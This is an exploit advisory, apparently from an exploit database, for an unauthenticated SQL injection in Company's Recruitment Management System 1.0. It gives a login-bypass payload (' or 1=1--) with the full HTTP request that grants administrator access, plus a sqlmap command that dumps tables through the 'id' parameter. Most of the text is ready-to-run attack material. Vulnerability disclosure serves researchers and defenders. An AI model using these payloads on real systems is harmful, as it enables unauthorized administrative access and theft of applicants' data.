Company's Recruitment Management System 1.0 - 'Multiple' SQL Injection (Unauthenticated)

2021-10-15
ID: 104845
CVE: None
Download vulnerable application: None
# Title: 
# Exploit Author: Yash Mahajan 
# Date: 2021-10-09
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Version: 1
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Tested On: Windows 10, XAMPP 
# Vulnerable Parameters: "id" , "username"

Steps to Reproduce:

A) SQL Injection (Authentication Bypass)

1) Navigate to http://localhost/employment_application/admin/login.php
2) Enter the payload into the username field as "' or 1=1-- " without double-quotes and type anything into the password field.
3) Click on "Login" button and you are logged in as administrator.

Request:
========

POST /employment_application/Actions.php?a=login HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 38
Origin: http://localhost
Connection: close
Referer: http://localhost/employment_application/admin/login.php
Cookie: PHPSESSID=fk1gp1s7stu7kitjmhvjfakjqk
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

username='+or+1%3D1--+-&password=admin

--------------------------------------------------------------------------------

B)

1) Vulnerable Parameter: "id"
2) Sqlmap Command to get retrieve tables from the database
3) python sqlmap.py -u "http://localhost/employment_application/?page=view_vacancy&id=1"  --level=3 --risk=2 --banner --dbms=sqlite --tables
1-4-2 (www01)